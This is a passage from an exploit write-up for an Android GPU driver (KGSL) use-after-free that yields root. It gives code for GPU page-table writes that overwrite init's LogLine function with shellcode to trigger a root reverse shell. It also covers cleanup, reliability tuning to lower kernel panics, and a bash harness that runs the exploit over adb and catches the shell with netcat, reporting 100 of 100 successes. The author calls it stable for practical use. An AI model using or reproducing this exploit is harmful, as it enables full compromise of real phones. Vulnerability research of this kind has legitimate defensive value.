  cmd[dw++] = (uint32_t)(new_pte >>32);
  ...

  if(ioctl(fd,IOCTL_KGSL_GPU_COMMAND, &c)==0

Stage 4: Shellcode Injection & Trigger & Recover

  1. Using the 1st PTE, insert shellcode into the code address corresponding to LogLine. read(fd_shellcode,(void *)(gb_target_addr+PAGE_SIZE + 0x2d4),287)
  2. Trigger the preliminary orphan process (child2) prepared in Stage 1, making it an orphan process so that it gets reparented with init as its parent. (code is in Stage 2-1)
  3. After child2 terminates, a SIGCHLD signal occurs, and LogLine is called in init’s signal handler.
  4. Since the LogLine function code has been overwritten with the shellcode, execution flow is hijacked, resulting in a reverse shell (root privileges).
  5. After waiting for time for the shellcode to execute, restore the original LogLine with read(fd_recover,(void *)(gb_target_addr+PAGE_SIZE+0x2d4),287).
  6. Call recover_origin to restore that PTE with the 1st PTE value that was backed up in Stage 3. (Using GPU read/write)
...
split64(base+8, &d_lo, &d_hi);
cmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
cmd[dw++] = d_lo;
cmd[dw++] = d_hi;
cmd[dw++] = (uint32_t)(orig_pte0 & 0xffffffffu);

split64(base + 12, &d_lo, &d_hi);
cmd[dw++] = cp_type7_packet(CP_MEM_WRITE, 3);
cmd[dw++] = d_lo;
cmd[dw++] = d_hi;
cmd[dw++] = (uint32_t)(orig_pte0 >> 32);
...
if (ioctl(fd, IOCTL_KGSL_GPU_COMMAND, &c) == 0) {
    ...
}
  7. Finally, perform cleanup by calling IOCTL_KGSL_GPUOBJ_FREE, munmap, and close.
struct kgsl_gpuobj_free free_req = {0};
if (ph_id) {
    free_req.id = ph_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) { /* ... */ }
}
if (overlap_id) {
    free_req.id = overlap_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) { /* ... */ }
}
if (uaf_id) {
    free_req.id = uaf_id;
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_req) < 0) { /* ... */ }
}

if (overlap_vma && overlap_vma != MAP_FAILED) {
    munmap(overlap_vma, overlap_mmapsize);
}
if (ph_vma && ph_vma != MAP_FAILED) {
    munmap(ph_vma, ph_mmapsize);
}
if (bogus_vma && bogus_vma != MAP_FAILED) {
    munmap(bogus_vma, PAGE_SIZE * 3);
}

5) Reliability & tweaks

Issue: PFN manipulation after mmap spray (Write-Back)

  1. After the mmap spray, while reading the PTEs of the discovered page table, the PTE value for the memory region where libbase.so was mapped occasionally appeared as 0.
  2. I initially suspected that the “touch” operation was being optimized away by the compiler, preventing the page fault from occurring. I changed the access to use volatile, but it still failed probabilistically.
  3. Consequently, I dumped the entire page table and observed a situation where some parts were allocated while others remained unallocated.
  4. I suspected that the combination of page #1 being in a corrupted state and the sig_num pages (1, 3, 5, 7, 9) being non-contiguous might be causing this issue. Therefore, I proceeded to allocate pages 0, 2, 4, 6, and 8 as well, and then performed a dump.
  5. Upon failure, the dump revealed that pages 0, 2, 4, 6 formed one coherent block (either allocated together or zeroed together), while page 8 was isolated as a separate block, each showing either allocated or zeroed state independently.
  6. At this point, I strongly suspected that the allocated/zeroed status was split at a granularity of 0x40 bytes.
  7. I recalled that 0x40 bytes is the size of a cache line, and that when I perform a dump, the GPU (DMA) accesses RAM directly. This explained why, even though the page fault definitely occurred (on the CPU), parts of the actual page table in RAM appeared as zeros in 0x40-byte units: the CPU’s writes were still sitting in dirty cache lines (cache incoherency).
  8. Since the target was a kernel address, I could not easily use clear_cache. Instead, I simply added a sleep call to induce a context switch, expecting the cached data to be flushed (written back) to RAM.
  9. Subsequently, the issue was resolved with a near 100% success rate.

Issue: task_struct Not Found

  1. There were instances where the task_struct from the fork spray could not be located, even after scanning all pages within the UAF region. This phenomenon occurred consistently when repeated attempts were made without a system reboot.
  2. Initially, I suspected a cleanup failure was the cause. I rigorously performed munmap and close operations on KGSL-related resources and file descriptors before returning, but this yielded no significant improvement. Even adding retry logic to restart the process upon failure produced the same “not found” error repeatedly.
  3. I hypothesized that the root cause lay in the slab allocator’s behavior. Since the sprayed task_struct objects are freed at the end of an attempt, a subsequent exploit run simply reuses these recently freed slab cache objects (recycling) rather than allocating a fresh page that corresponds to the UAF-controlled IOMMU region.
  4. To overcome this, I implemented a dynamic spray strategy: the spray count is incremented by 2,000 upon each failure. This ensures that the allocation demand eventually exceeds the size of the previously freed cache, forcing the allocator to fetch new pages, including the target UAF page.
  5. While it would have been more efficient to persist the spray count from the previous run, I considered it architecturally unsound to design an exploit that relies on the state of a prior execution. Therefore, I opted for a stateless approach that increments from the initial value upon every failure, prioritizing reliability and correctness over speed.

Issue: Intermittent Kernel Panic (Root Cause Unknown)

/proc/last_kmsg: <10>[ 426.359341] [0: init:19811] init: ���

  1. The panic likely occurred when LogLine() was invoked at an inopportune moment: either while it was being overwritten with shellcode or during restoration. The corrupted output suggests LogLine() was called while in a partially modified state.
  2. Eliminated all orphan processes except the intentionally created one used to trigger LogLine(), which reduced unintended LogLine() invocations.
  3. Removed the previously used __builtin___clear_cache() call after overwriting LogLine(), which reduced the panic rate (mechanism unclear).
  4. Fine-tuned various timing parameters, including sleep() durations within the exploit and shell-termination timing on the reverse-shell receiver side; even minor changes (e.g., merely removing echo "ps -ef | grep init" from the test code) could disrupt timing and cause zombie processes.

Results

Before fixes: 5% panic rate

After fixes: <1% panic rate

Limitations

The root cause remains unidentified. These are empirical workarounds rather than principled solutions. The exploit is now sufficiently stable for practical use, though the underlying race condition is not fully understood.

Reliability test code

#!/bin/bash
adb push ./exploit /data/local/tmp/ex_test
sleep 1
adb shell "chmod +x /data/local/tmp/ex_test"
echo "start" > out.txt
for j in {1..10}; do
        for i in {1..10}; do
                echo "$j:$i" >> out.txt
                adb shell /data/local/tmp/ex_test &

                (
                        echo "id";
                        echo "ps -ef | grep '0 sh'";
                        echo "ps -ef | grep init";
                        echo "exit"
                ) | adb shell "nc -lp 1337" >> out.txt

                sleep 6
        done
        adb reboot
        echo "reboot"
        sleep 100
done
echo "All complete"
awk '
/^[0-9]+:[0-9]+$/ { t++ }   # count attempt markers ("j:i")
/^uid=0\(root\)/  { s++ }   # count runs that yielded a root shell
END {
    if (t > 0)
        printf "success=%d total=%d prob=%.4f\n", s, t, s / t
    else
        print "success=0 total=0 prob=0"
}
' out.txt

Result

All complete
success=100 total=100 prob=1.0000

out.txt

6) Video & exploit

video

video

Exploit code

ex.c

7) References

https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2023/CVE-2023-33107.html

https://i.blackhat.com/BH-US-23/Presentations/US-23-Lin-bad_io_uring-wp.pdf

https://blackhat.com/docs/us-17/thursday/us-17-Shen-Defeating-Samsung-KNOX-With-Zero-Privilege.pdf

https://soez.github.io/posts/CVE-2022-22265-Samsung-npu-driver/